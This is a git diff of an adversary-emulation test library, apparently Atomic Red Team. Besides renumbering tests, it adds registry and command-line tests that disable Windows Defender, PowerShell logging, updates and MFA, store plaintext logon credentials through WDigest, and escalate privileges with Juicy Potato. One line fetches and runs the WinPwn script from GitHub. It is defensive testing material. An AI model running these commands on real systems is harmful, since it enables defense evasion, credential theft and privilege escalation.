 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -827,7 +862,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #20 - Activate Windows NoControlPanel Group Policy Feature
+## Atomic Test #21 - Activate Windows NoControlPanel Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -861,7 +896,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #21 - Activate Windows NoFileMenu Group Policy Feature
+## Atomic Test #22 - Activate Windows NoFileMenu Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -895,7 +930,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #22 - Activate Windows NoClose Group Policy Feature
+## Atomic Test #23 - Activate Windows NoClose Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -929,7 +964,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy Feature
+## Atomic Test #24 - Activate Windows NoSetTaskbar Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -963,7 +998,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy Feature
+## Atomic Test #25 - Activate Windows NoTrayContextMenu Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -997,7 +1032,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy Feature
+## Atomic Test #26 - Activate Windows NoPropertiesMyDocuments Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1031,7 +1066,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #26 - Hide Windows Clock Group Policy Feature
+## Atomic Test #27 - Hide Windows Clock Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1065,7 +1100,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #27 - Windows HideSCAHealth Group Policy Feature
+## Atomic Test #28 - Windows HideSCAHealth Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1099,7 +1134,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #28 - Windows HideSCANetwork Group Policy Feature
+## Atomic Test #29 - Windows HideSCANetwork Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1133,7 +1168,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #29 - Windows HideSCAPower Group Policy Feature
+## Atomic Test #30 - Windows HideSCAPower Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1167,7 +1202,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #30 - Windows HideSCAVolume Group Policy Feature
+## Atomic Test #31 - Windows HideSCAVolume Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect..
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1201,7 +1236,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>
 
-## Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry
+## Atomic Test #32 - Windows Modify Show Compress Color And Info Tip Registry
 Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. 
 See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html
 
@@ -1236,7 +1271,7 @@ reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v S
 <br/>
 <br/>
 
-## Atomic Test #32 - Windows Powershell Logging Disabled
+## Atomic Test #33 - Windows Powershell Logging Disabled
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
 see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
 
@@ -1275,7 +1310,7 @@ reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v
 <br/>
 <br/>
 
-## Atomic Test #33 - Windows Add Registry Value to Load Service in Safe Mode without Network
+## Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode without Network
 Modify the registry to allow a driver, service, to persist in Safe Mode.
 see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
 Adding a subkey to Minimal with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode without networking. The same applies for the Network subkey.
@@ -1309,7 +1344,7 @@ reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMod
 <br/>
 <br/>
 
-## Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode with Network
+## Atomic Test #35 - Windows Add Registry Value to Load Service in Safe Mode with Network
 Modify the registry to allow a driver, service, to persist in Safe Mode with networking.
 see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
 Adding a subkey to Netowrk with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode with networking.
@@ -1343,7 +1378,7 @@ reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMod
 <br/>
 <br/>
 
-## Atomic Test #35 - Disable Windows Toast Notifications
+## Atomic Test #36 - Disable Windows Toast Notifications
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows toast notification.
 See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
 
@@ -1376,7 +1411,7 @@ reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotif
 <br/>
 <br/>
 
-## Atomic Test #36 - Disable Windows Security Center Notifications
+## Atomic Test #37 - Disable Windows Security Center Notifications
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows security center notification.
 See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
 
@@ -1409,7 +1444,7 @@ reg delete HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveS
 <br/>
 <br/>
 
-## Atomic Test #37 - Suppress Win Defender Notifications
+## Atomic Test #38 - Suppress Win Defender Notifications
 Modify the registry of the currently logged in user using reg.exe via cmd console to suppress the windows defender notification.
 See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
 
@@ -1442,7 +1477,7 @@ reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration"
 <br/>
 <br/>
 
-## Atomic Test #38 - Allow RDP Remote Assistance Feature
+## Atomic Test #39 - Allow RDP Remote Assistance Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to allow rdp remote assistance feature. This feature allow specific
 user to rdp connect on the targeted machine.
 See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
@@ -1476,7 +1511,7 @@ reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGe
 <br/>
 <br/>
 
-## Atomic Test #39 - NetWire RAT Registry Key Creation
+## Atomic Test #40 - NetWire RAT Registry Key Creation
 NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
 See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
 
@@ -1513,7 +1548,7 @@ reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
 <br/>
 <br/>
 
-## Atomic Test #40 - Ursnif Malware Registry Key Creation
+## Atomic Test #41 - Ursnif Malware Registry Key Creation
 Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
 More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
 
@@ -1547,7 +1582,7 @@ reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A
 <br/>
 <br/>
 
-## Atomic Test #41 - Terminal Server Client Connection History Cleared
+## Atomic Test #42 - Terminal Server Client Connection History Cleared
 The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
 
 **Supported Platforms:** Windows
@@ -1592,7 +1627,7 @@ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "
 <br/>
 <br/>
 
-## Atomic Test #42 - Disable Windows Error Reporting Settings
+## Atomic Test #43 - Disable Windows Error Reporting Settings
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems 
 encounter in specific application or process.
 See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
@@ -1628,7 +1663,7 @@ reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v Disabl
 <br/>
 <br/>
 
-## Atomic Test #43 - DisallowRun Execution Of Certain Applications
+## Atomic Test #44 - DisallowRun Execution Of Certain Applications
 Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it 
 using security product.
 
@@ -1665,7 +1700,7 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
 <br/>
 <br/>
 
-## Atomic Test #44 - Enabling Restricted Admin Mode via Command_Prompt
+## Atomic Test #45 - Enabling Restricted Admin Mode via Command_Prompt
 Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP.
 
 See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/)
@@ -1699,7 +1734,7 @@ reg delete "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAd
 <br/>
 <br/>
 
-## Atomic Test #45 - Mimic Ransomware - Enable Multiple User Sessions
+## Atomic Test #46 - Mimic Ransomware - Enable Multiple User Sessions
 This test emulates Mimic ransomware's ability to enable multiple user sessions by modifying the AllowMultipleTSSessions value within the Winlogon registry key. 
 See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
 
@@ -1732,7 +1767,7 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon
 <br/>
 <br/>
 
-## Atomic Test #46 - Mimic Ransomware - Allow Multiple RDP Sessions per User
+## Atomic Test #47 - Mimic Ransomware - Allow Multiple RDP Sessions per User
 This test emulates Mimic ransomware's ability to enable multiple RDP sessions per user by modifying the fSingleSessionPerUser value within the Terminal Server registry key. 
 See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
 
@@ -1765,7 +1800,7 @@ reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSes
 <br/>
 <br/>
 
-## Atomic Test #47 - Event Viewer Registry Modification - Redirection URL
+## Atomic Test #48 - Event Viewer Registry Modification - Redirection URL
 Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will open the URL or execute the program defined in the redirection URL registry entry.
 
 **Supported Platforms:** Windows
@@ -1802,7 +1837,7 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v Micr
 <br/>
 <br/>
 
-## Atomic Test #48 - Event Viewer Registry Modification - Redirection Program
+## Atomic Test #49 - Event Viewer Registry Modification - Redirection Program
 Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in the redirection program registry entry.
 
 **Supported Platforms:** Windows
@@ -1839,7 +1874,7 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v Micr
 <br/>
 <br/>
 
-## Atomic Test #49 - Enabling Remote Desktop Protocol via Remote Registry
+## Atomic Test #50 - Enabling Remote Desktop Protocol via Remote Registry
 Enabling RDP through remote registry.
 
 **Supported Platforms:** Windows
@@ -1871,7 +1906,7 @@ reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-T
 <br/>
 <br/>
 
-## Atomic Test #50 - Disable Win Defender Notification
+## Atomic Test #51 - Disable Win Defender Notification
 Disable Win Defender Notification. Redline is using this to disable this win defender feature.
 
 **Supported Platforms:** Windows
@@ -1903,7 +1938,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notif
 <br/>
 <br/>
 
-## Atomic Test #51 - Disable Windows OS Auto Update
+## Atomic Test #52 - Disable Windows OS Auto Update
 Disable Auto Update Windows OS feature. Redline is using this as part of its defense evasion.
 
 **Supported Platforms:** Windows
@@ -1935,7 +1970,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUp
 <br/>
 <br/>
 
-## Atomic Test #52 - Disable Windows Auto Reboot for current logon user
+## Atomic Test #53 - Disable Windows Auto Reboot for current logon user
 Disable Windows Auto Reboot for current logon user. Redline is using this as part of its defense evasion.
 
 **Supported Platforms:** Windows
@@ -1967,7 +2002,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRe
 <br/>
 <br/>
 
-## Atomic Test #53 - Windows Auto Update Option to Notify before download
+## Atomic Test #54 - Windows Auto Update Option to Notify before download
 Windows Auto Update Option to Notify before download. Redline is using this as part of its defense evasion.
 
 **Supported Platforms:** Windows
@@ -1999,7 +2034,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOption
 <br/>
 <br/>
 
-## Atomic Test #54 - Do Not Connect To Win Update
+## Atomic Test #55 - Do Not Connect To Win Update
 Do Not Connect To Win Update. Redline is using this as part of its defense evasion.
 
 **Supported Platforms:** Windows
@@ -2031,7 +2066,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnec
 <br/>
 <br/>
 
-## Atomic Test #55 - Tamper Win Defender Protection
+## Atomic Test #56 - Tamper Win Defender Protection
 Tamper Win Defender Protection. RedLine Stealer is executing another component file to modify this win defender feature in registry. 
 Take note that this modification might not be enough to disable this feature but can be a good indicator of malicious process that 
 tries to tamper this Win Defender feature settings.
@@ -2065,7 +2100,7 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection
 <br/>
 <br/>
 
-## Atomic Test #56 - Snake Malware Registry Blob
+## Atomic Test #57 - Snake Malware Registry Blob
 The following Atomic Test creates a registry blob in HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds, which is related to Snake Malware. Per the report, upon execution, Snake's WerFault.exe will attempt to decrypt an encrypted blob within the Windows
 registry that is typically found at HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds. The encrypted data includes the AES key, IV, and path that is used to find and decrypt the file containing Snake's kernel driver and kernel driver loader.
 
@@ -2098,7 +2133,7 @@ $typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; Remove-ItemPropert
 <br/>
 <br/>
 
-## Atomic Test #57 - Allow Simultaneous Download Registry
+## Atomic Test #58 - Allow Simultaneous Download Registry
 A registry modification to allow Simultaneous download in the system.
 
 **Supported Platforms:** Windows
@@ -2132,7 +2167,7 @@ reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
 <br/>
 <br/>
 
-## Atomic Test #58 - Modify Internet Zone Protocol Defaults in Current User Registry - cmd
+## Atomic Test #59 - Modify Internet Zone Protocol Defaults in Current User Registry - cmd
 This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using the reg.exe utility via the command prompt. Such modifications can be indicative of an adversary trying to weaken browser security settings. Upon execution, if successful, the message "The operation completed successfully." will be displayed.
 To verify the effects of the test:
 1. Open the Registry Editor (regedit.exe).
@@ -2174,7 +2209,7 @@ reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Se
 <br/>
 <br/>
 
-## Atomic Test #59 - Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell
+## Atomic Test #60 - Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell
 This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using PowerShell. Such modifications can be indicative of an adversary attempting to weaken browser security settings. 
 To verify the effects of the test:
 1. Open the Registry Editor (regedit.exe).
@@ -2218,7 +2253,7 @@ Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
 <br/>
 <br/>
 
-## Atomic Test #60 - Activities To Disable Secondary Authentication Detected By Modified Registry Value.
+## Atomic Test #61 - Activities To Disable Secondary Authentication Detected By Modified Registry Value.
 Detect the disable secondary authentication activities that adversary attempt to bypass MFA and to get the unauthorized access to the system or sensitive data.
 See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.SecondaryAuthenticationFactor::MSSecondaryAuthFactor_AllowSecondaryAuthenticationDevice).
 
@@ -2251,7 +2286,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\SecondaryAuthenticationFactor" /v "All
 <br/>
 <br/>
 
-## Atomic Test #61 - Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.
+## Atomic Test #62 - Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.
 Detect the Microsoft FIDO authentication disable activities that adversary attempt to gains access to login credentials (e.g., passwords), they may be able to impersonate the user and access sensitive accounts or data and also increases the risk of falling victim to phishing attacks.
 See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.FidoAuthentication::AllowFidoDeviceSignon).
 
@@ -2284,7 +2319,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v "AllowExternalDeviceSignon" /
 <br/>
 <br/>
 
-## Atomic Test #62 - Scarab Ransomware Defense Evasion Activities
+## Atomic Test #63 - Scarab Ransomware Defense Evasion Activities
 Scarab Ransomware defense evasion activities that can abuse the registry values to modify the settings of the Credential Security Support Provider to overcome potential RDP connection issues.
 [Scarab Ransomware Article](https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/)
 
@@ -2317,7 +2352,7 @@ reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\
 <br/>
 <br/>
 
-## Atomic Test #63 - Disable Remote Desktop Anti-Alias Setting Through Registry
+## Atomic Test #64 - Disable Remote Desktop Anti-Alias Setting Through Registry
 A modification registry to disable RDP anti-alias settings. This technique was seen in DarkGate malware as part of its installation
 
 **Supported Platforms:** Windows
@@ -2349,7 +2384,7 @@ reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Serv
 <br/>
 <br/>
 
-## Atomic Test #64 - Disable Remote Desktop Security Settings Through Registry
+## Atomic Test #65 - Disable Remote Desktop Security Settings Through Registry
 A modification registry to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation
 
 **Supported Platforms:** Windows
@@ -2381,7 +2416,7 @@ reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Serv
 <br/>
 <br/>
 
-## Atomic Test #65 - Disabling ShowUI Settings of Windows Error Reporting (WER)
+## Atomic Test #66 - Disabling ShowUI Settings of Windows Error Reporting (WER)
 A modification registry to disable ShowUI settings of Windows Error Report. This registry setting can influence the behavior of error reporting dialogs or prompt box. 
 This technique was seen in DarkGate malware as part of its installation.
 
@@ -2414,7 +2449,7 @@ reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI
 <br/>
 <br/>
 
-## Atomic Test #66 - Enable Proxy Settings
+## Atomic Test #67 - Enable Proxy Settings
 A modification registry to enable proxy settings. This technique was seen in DarkGate malware as part of its installation.
 
 **Supported Platforms:** Windows
@@ -2446,7 +2481,7 @@ reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v Pr
 <br/>
 <br/>
 
-## Atomic Test #67 - Set-Up Proxy Server
+## Atomic Test #68 - Set-Up Proxy Server
 A modification registry to setup proxy server. This technique was seen in DarkGate malware as part of its installation.
 
 **Supported Platforms:** Windows
@@ -2478,7 +2513,7 @@ reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
 <br/>
 <br/>
 
-## Atomic Test #68 - RDP Authentication Level Override
+## Atomic Test #69 - RDP Authentication Level Override
 A modification registry to override RDP Authentication Level. This technique was seen in DarkGate malware as part of its installation.
 
 **Supported Platforms:** Windows
diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index e5ac6add..6d42e897 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -49,6 +49,20 @@ atomic_tests:
       reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: Use Powershell to Modify registry to store logon credentials
+  auto_generated_guid: 68254a85-aa42-4312-a695-38b7276307f8
+  description: |
+    Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
+    Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Set-ItemProperty -Force -Path  'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name  'UseLogonCredential' -Value '1' -ErrorAction Ignore
+    cleanup_command: |
+      Set-ItemProperty -Force -Path  'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name  'UseLogonCredential' -Value '0' -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
 - name: Add domain to Trusted sites Zone
   auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
   description: |
diff --git a/atomics/T1120/T1120.md b/atomics/T1120/T1120.md
index 55c9982b..cef8347b 100644
--- a/atomics/T1120/T1120.md
+++ b/atomics/T1120/T1120.md
@@ -8,6 +8,8 @@
 
 - [Atomic Test #2 - WinPwn - printercheck](#atomic-test-2---winpwn---printercheck)
 
+- [Atomic Test #3 - Peripheral Device Discovery via fsutil](#atomic-test-3---peripheral-device-discovery-via-fsutil)
+
 
 <br/>
 
@@ -72,4 +74,32 @@ printercheck -noninteractive -consoleoutput
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Peripheral Device Discovery via fsutil
+Performs pheripheral device discovery utilizing fsutil to list all drives.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 424e18fd-48b8-4201-8d3a-bf591523a686
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+fsutil fsinfo drives
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1120/T1120.yaml b/atomics/T1120/T1120.yaml
index 6513a7d1..68e2cc99 100644
--- a/atomics/T1120/T1120.yaml
+++ b/atomics/T1120/T1120.yaml
@@ -23,4 +23,13 @@ atomic_tests:
       $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       printercheck -noninteractive -consoleoutput
-    name: powershell
\ No newline at end of file
+    name: powershell
+- name: Peripheral Device Discovery via fsutil
+  auto_generated_guid: 424e18fd-48b8-4201-8d3a-bf591523a686
+  description: Performs pheripheral device discovery utilizing fsutil to list all drives.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      fsutil fsinfo drives
+    name: command_prompt
diff --git a/atomics/T1134.001/T1134.001.md b/atomics/T1134.001/T1134.001.md
index 4fbb30df..39df6c94 100644
--- a/atomics/T1134.001/T1134.001.md
+++ b/atomics/T1134.001/T1134.001.md
@@ -16,6 +16,8 @@ When an adversary would instead use a duplicated token to create a new process r
 
 - [Atomic Test #4 - Bad Potato](#atomic-test-4---bad-potato)
 
+- [Atomic Test #5 - Juicy Potato](#atomic-test-5---juicy-potato)
+
 
 <br/>
 
@@ -181,4 +183,61 @@ Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\BadPotato.ex
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Juicy Potato
+This Atomic utilizes Juicy Potato to obtain privilege escalation. 
+Upon successful execution of this test, a vulnerable CLSID will be used to execute a process with system permissions.
+This tactic has been previously observed in SnapMC Ransomware, amongst numerous other campaigns. 
+[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f095e373-b936-4eb4-8d22-f47ccbfbe64a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| potato_path | Path to the JuicyPotato.exe file | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;JuicyPotato.exe|
+| listening_port | COM server listen port | integer | 7777|
+| target_exe | Target executable to launch with system privileges | path | $env:windir&#92;system32&#92;notepad.exe|
+| target_CLSID | Vulnerable CLSID to impersonate privileges | string | {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+cmd /c '#{potato_path}' -l '#{listening_port}' -t * -p '#{target_exe}' -c '#{target_CLSID}'
+```
+
+#### Cleanup Commands:
+```powershell
+get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: JuicyPotato.exe must exist on disk
+##### Check Prereq Commands:
+```powershell
